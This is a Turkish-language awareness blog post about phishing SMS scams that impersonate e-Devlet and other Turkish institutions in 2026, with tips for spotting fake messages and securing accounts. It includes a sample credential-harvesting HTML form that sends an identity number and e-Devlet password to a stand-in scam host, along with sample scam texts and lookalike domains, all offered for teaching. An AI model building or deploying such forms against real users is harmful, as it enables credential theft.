2026’ya girerken, Türkiye’de dijital dolandırıcılık yöntemleri giderek daha sofistike hale geldi. Özellikle e-Devlet’i hedef alan sahte SMS’ler ve phishing linkleri, vatandaşların kişisel ve finansal bilgilerini ele geçirmek için kullanılan en yaygın tuzaklardan biri. Bu tür dolandırıcılıklar, sadece finansal kayıplara değil, aynı zamanda ciddi veri ihlallerine ve kişisel güvenlik zafiyetlerine yol açabiliyor.
Yirmi yılı aşkın süredir sistem ve network güvenliği alanında çalışıyorum; kernel module blacklist’lerinden fail2ban pattern’lerine, switch hardening’den ZTNA mimarilerine kadar birçok teknik detayı deneyimledim. Ancak en sağlam güvenlik duvarları bile, insan faktörünü hedef alan sosyal mühendislik saldırıları karşısında çoğu zaman yetersiz kalıyor. Bu yazıda, 2026’da Türkiye’de en çok karşılaşılan dolandırıcılık senaryolarını, bunları nasıl tanıyacağımızı ve kendimizi nasıl koruyacağımızı kendi tecrübelerimle anlatacağım.
2026’da e-Devlet Tuzağı Neden Bu Kadar Yaygın?
e-Devlet tuzağı, 2026 yılında Türkiye’deki en yaygın dolandırıcılık yöntemlerinden biri haline geldi çünkü e-Devlet, vatandaşların devletle olan tüm işlemlerini tek bir portal üzerinden yapmasını sağlayan merkezi ve güvenilir bir platform olarak algılanıyor. Bu algı, dolandırıcılar için sahte bir “yetkilendirme” hissi yaratmak ve mağdurları ikna etmek adına büyük bir fırsat sunuyor. Kullanıcıların dijital okuryazarlık seviyeleri farklılık gösterse de, e-Devlet’in resmi imajı herkes üzerinde güçlü bir etki bırakıyor.
Bir arkadaşım, büyük bir teknoloji şirketinde network mühendisi olmasına rağmen, “SGK prim borcunuz bulunmaktadır, detaylar için tıklayın: bit.ly/sgk-borc” şeklinde gelen sahte bir SMS’e neredeyse kanıyordu. Linkin ne kadar kısa ve güvenilmez durduğunu fark etmesi son anda oldu. Bu olay, sadece son kullanıcıların değil, teknolojiye hakim kişilerin bile bu tür tuzaklara düşebileceğini gösterdi bana. Dolandırıcılar, genellikle resmi kurumların adını kullanarak, vatandaşların korku, merak veya aciliyet gibi temel duygularını hedef alıyorlar.
Bu saldırılar genellikle, kullanıcıyı sahte bir e-Devlet giriş sayfasına yönlendirerek T.C. kimlik numarası ve e-Devlet şifresi gibi kritik bilgileri çalmayı amaçlar. Sahte SMS’ler, genellikle “Adınıza icra takibi başlatılmıştır,” “Tapu devir işleminiz onay bekliyor,” veya “Sağlık Bakanlığı’ndan test sonucunuz” gibi metinler içerir. Bu metinler, insanları hızlıca linke tıklamaya teşvik etmek için tasarlanmıştır. Bu tür SMS’lerin ardındaki teknik altyapı genellikle basit olsa da, sosyal mühendislik boyutu son derece karmaşıktır.
Sahte SMS ve Phishing Linkleri Nasıl Tanınır?
Sahte SMS’ler ve phishing linkleri, genellikle belirgin özelliklere sahiptir; bunları tanımak, dolandırıcılığın ilk aşamasında tuzağa düşmenizi engelleyebilir. Aciliyet hissi yaratma, yazım yanlışları ve resmi olmayan, kısaltılmış veya şüpheli URL’ler kullanma, dolandırıcıların sıkça başvurduğu taktiklerdir. Bu mesajlar, sizin hızlıca tepki vermenizi ve düşünmeden hareket etmenizi sağlamak için özel olarak tasarlanmıştır.
Kendi Android spam blocker uygulamamda gördüğüm binlerce örnek var. Dolandırıcılar, “kargo teslimatı gecikti”, “banka hesabınız askıya alındı”, “vergi borcunuz var” gibi temaları sürekli değiştiriyorlar. Bu mesajların ortak özelliği, sizi bir şekilde strese sokup, linke tıklamanızı sağlamaktır. Hiçbir resmi kurum, e-Devlet veya banka, size SMS ile doğrudan kişisel bilgi isteyen veya “tıklayın” diyen bir link göndermez. Böyle bir durumla karşılaştığımda hep şüpheyle yaklaşıyorum.
Aşağıdaki tablo, gerçek ve sahte SMS’ler arasındaki temel farkları özetliyor:
| Özellik | Gerçek/Resmi SMS | Sahte/Phishing SMS |
|---|---|---|
| Gönderici Adı | Genellikle kurumsal bir isim (örn. e-Devlet, SGK, Bankanız) | Kişisel numara, bilinmeyen bir numara veya kurumsal ismi taklit eden bir isim (örn. EDEVLET, SGSK) |
| Aciliyet | Nadiren aciliyet vurgusu, bilgilendirme amaçlı | ”Hemen”, “Son Gün”, “Hesabınız Kapatılacak” gibi acil ifadeler |
| Yazım/Dilbilgisi | Hatasız, profesyonel dil | Yazım ve dilbilgisi hataları, devrik cümleler |
| URL Yapısı | Resmi kurumun ana domaini (örn. turkiye.gov.tr, bankaadi.com.tr) | Kısaltılmış URL’ler (bit.ly, tinyurl), anlamsız domainler, resmi domaini taklit eden hatalı yazımlar (örn. turkiye-gov.net, e-devletim.org) |
| Kişiselleştirme | Adınıza veya TC kimlik numaranıza özel olabilir | Genellikle genel ifadeler (“Değerli vatandaşımız”) |
| Bilgi Talebi | SMS ile kişisel bilgi veya şifre istemez | Kişisel bilgi, şifre, kart numarası talep eder |
Bu tip bir saldırı, aslında bir çeşit “social engineering” saldırısıdır; tıpkı bir sistemin zayıf şifresini bulmak yerine, kullanıcıyı kandırarak şifresini ele geçirmeye çalışmak gibi. Kullanıcıyı bir şekilde manipüle ederek kendi güvenlik katmanlarını aşmaya ikna etmek, dolandırıcıların en sevdiği yöntemdir. Bu yüzden her zaman göndericiden, linkten ve içeriğin mantığından şüphe duymak gerekiyor.
Kimlik Avı (Phishing) Sitelerinin Teknik İşleyişi Nedir?
Kimlik avı (phishing) siteleri, meşru bir siteyi taklit ederek kullanıcı bilgilerini çalmak için tasarlanmış, genellikle basit HTML/CSS ve bir backend scriptinden oluşan web sayfalarıdır. Bu siteler, görünüş olarak resmi bir bankanın veya e-Devlet portalının birebir kopyası gibi durur. Ancak asıl amaçları, sizin giriş bilgilerinizi, kredi kartı numaralarınızı veya diğer hassas verilerinizi ele geçirmektir. Bu sitelerin ardında karmaşık bir altyapı yoktur, genellikle birkaç PHP veya Python scriptiyle çalışırlar.
Dolandırıcılar, bu sahte siteleri genellikle güvenilir gibi görünen ancak aslında tamamen farklı olan alan adlarına (domain) yerleştirirler. Örneğin, turkiye.gov.tr yerine turkiye-gov.net veya e-devletim.org gibi isimler kullanabilirler. Bu, “domain squatting” veya “typosquatting” olarak bilinen bir taktiktir; kullanıcıların URL’yi hızlıca okurken veya yazarken yapabileceği ufak hatalardan yararlanmayı hedefler. Backend’de ise, girilen verileri basitçe bir dosyaya kaydeden veya bir e-posta adresine gönderen küçük bir script çalışır.
Kendi yan ürünümün birinde, kullanıcıların güvenliğini sağlamak için sürekli rate limiting, JWT (JSON Web Token) ve OAuth2 pattern’leri üzerinde çalıştım. Phishing siteleri, bu teknik güvenlik katmanlarının dışından, doğrudan kullanıcıya saldırır; yani zafiyet sistemde değil, kullanıcının kendisindedir. Orada bile, sahte giriş denemelerini tespit etmek için IP bazlı limitler veya anormal davranış algılama mekanizmaları kurmuştum. Bu da bir nevi sürekli bir kedi fare oyunu gibiydi.
Basit bir kimlik avı formu şöyle görünebilir:
<!-- Sahte bir e-Devlet giriş sayfası HTML formu örneği -->
<form action="http://dolandirici-site.com/login.php" method="POST">
<label for="tcKimlik">T.C. Kimlik No:</label>
<input type="text" id="tcKimlik" name="tcKimlik" required>
<label for="eDevletSifre">e-Devlet Şifresi:</label>
<input type="password" id="eDevletSifre" name="eDevletSifre" required>
<button type="submit">Giriş Yap</button>
</form>Bu HTML formu, kullanıcı Giriş Yap butonuna bastığında, girilen tcKimlik ve eDevletSifre bilgilerini http://dolandirici-site.com/login.php adresine POST isteği ile gönderir. login.php adlı basit bir PHP scripti ise bu bilgileri alıp bir dosyaya kaydeder ve belki de kullanıcıyı gerçek e-Devlet sitesine yönlendirir, böylece mağdur hiçbir şeyden şüphelenmez. Benzer şekilde, bir SSH login denemesinde fail2ban ile yanlış şifre girişlerini takip edip IP’yi banladığımız gibi, bu tür sitelerde de aslında kullanıcının hatalı davranışlarını (sahte siteye şifre girme) tespit edebilen mekanizmalar olmalı. Ancak bu, maalesef kullanıcı tarafında bir farkındalık meselesi.
Hesap Güvenliğini Artırmak İçin Hangi Adımları Atabiliriz?
Hesap güvenliğini artırmak için atabileceğimiz adımlar, dijital dünyadaki kişisel kalemizi güçlendirmenin en temel yoludur. İki faktörlü kimlik doğrulama (2FA), her hesap için farklı ve güçlü şifreler kullanmak ve cihaz güvenliğini sağlamak, dolandırıcılıklara karşı bizi koruyacak ana stratejilerdir. Bu adımlar, siber güvenliğin en temel prensipleridir ve sadece teknik sistemler için değil, bireysel kullanıcılar için de hayati öneme sahiptir.
Bir bankanın iç platformunda çalışırken, kullanıcıların en büyük güvenlik zafiyetinin zayıf veya tekrar eden şifreler olduğunu görmüştüm. Bir kullanıcının şifresi ele geçirildiğinde, aynı şifreyi kullandığı diğer tüm hesapları da risk altına giriyordu. Bu yüzden ben kendi sistemlerimde 2FA’yı zorunlu tutuyorum, hatta kendi VPS’imde bile SSH (Secure Shell) için 2FA kullanıyorum. Bu basit önlem, şifreniz çalınsa bile hesabınıza izinsiz erişimi çok daha zor hale getirir.
İşte hesap güvenliğinizi artırmak için atabileceğiniz pratik adımlar:
- İki Faktörlü Kimlik Doğrulama (2FA) Kullanın: Tüm önemli hesaplarınızda (banka, e-Devlet, e-posta, sosyal medya) 2FA’yı aktif edin. SMS tabanlı 2FA yerine, Authenticator uygulamalarını (Google Authenticator, Authy, Microsoft Authenticator) tercih edin. SMS, SIM kart dolandırıcılıkları (SIM-swapping) nedeniyle daha az güvenlidir.
- Güçlü ve Farklı Şifreler Belirleyin: Her platform için benzersiz, uzun ve karmaşık şifreler kullanın. Şifre yöneticileri (KeePass, Bitwarden, 1Password) bu yükü hafifletir ve şifrelerinizi güvenli bir şekilde saklamanıza yardımcı olur. “Şifremi unuttum” özelliğiyle uğraşmak, çalınan bir hesabı geri almaya çalışmaktan çok daha kolaydır.
- Cihazlarınızı Güncel Tutun: İşletim sisteminizi (Windows, macOS, Android, iOS) ve kullandığınız tüm uygulamaları düzenli olarak güncelleyin. Güvenlik yamaları, bilinen güvenlik zafiyetlerini kapatarak cihazlarınızı potansiyel saldırılardan korur. Linux’ta bile kernel güncellemelerini düzenli takip ederim, bu mobil cihazlar için de geçerli.
- Güvenilir Antivirüs/Antimalware Yazılımı Kullanın: Bilgisayarınızda ve telefonunuzda güvenilir bir antivirüs veya antimalware yazılımı bulundurun ve düzenli taramalar yapın. Bu yazılımlar, zararlı yazılımları tespit edip kaldırmanıza yardımcı olur.
Bu adımlar, hem teknik bilgiye sahip kullanıcılar hem de genel kullanıcılar için geçerlidir. Unutmayın, dijital güvenlik bir süreçtir, tek seferlik bir işlem değil.
Oltalama Saldırılarına Karşı Psikolojik Direnç Geliştirmek
Oltalama (phishing) saldırılarına karşı psikolojik direnç geliştirmek, teknik önlemler kadar önemlidir; çünkü dolandırıcılar genellikle aciliyet, korku veya merak gibi temel insan duygularını tetikleyerek hızlı ve düşüncesiz kararlar almanızı hedefler. Bu duygusal manipülasyonu fark etmek ve mesajın ardındaki niyeti sorgulamak, tuzağa düşmemenin anahtarıdır. En gelişmiş firewall’lar bile, bir kullanıcının kendi isteğiyle sahte bir siteye bilgi girmesini engelleyemez.
Kurumsal yazılım geliştirirken, kullanıcı eğitimlerinin ne kadar önemli olduğunu gördüm. ERP sistemlerinde, operatör ekranları tasarlarken bile kullanıcıların yorgunluk, dikkat dağınıklığı gibi faktörlerle hata yapabileceğini göz önünde bulundurarak basit ve anlaşılır arayüzler taslamaya çalıştım. Ancak phishing’de durum farklı; burada kötü niyetli bir taraf, kullanıcının zayıf anlarını hedef alıyor. Bu yüzden teknik çözümler kadar insan faktörüne yatırım yapmak ve bilinçlenmek zorundayız.
Örneğin, “Acil! Banka hesabınız askıya alınmıştır, hemen bu linkten güncelleyin: banka-destek.net” gibi bir SMS, sizde panik yaratmayı ve linke tıklamanızı sağlamayı amaçlar. Benzer bir şekilde, bir üretim firmasının ERP’sinde, geç sevkiyat raporu hep eksik geliyordu. Sebebini bulmak üç gün almıştı: Bir operatör, kendisine gelen sahte bir “sistem güncellemesi” e-postasına tıklamış ve sistemine zararlı yazılım bulaşmıştı. Bu, teknik bilginin her zaman yeterli olmadığını gösteren somut bir örnekti.
Sonuç: Dijital Güvenlik Bir Refleks Meselesidir
Sahte SMS’lerden e-Devlet taklidi sitelere kadar bu tuzakların ortak yanı, teknik bir açığı değil; insanın acele ve güven duygusunu hedef almasıdır. En iyi savunma yavaşlamak ve doğrulamaktır: bir linke tıklamadan önce adresi kontrol etmek, SMS yerine uygulama tabanlı 2FA kullanmak ve şüphede kalınca kurumu kendiniz aramak. Teknoloji ne kadar gelişirse gelişsin son karar her zaman sizde — ve o kararı sakin verdiğinizde, dolandırıcının elinde tutacak bir şey kalmaz.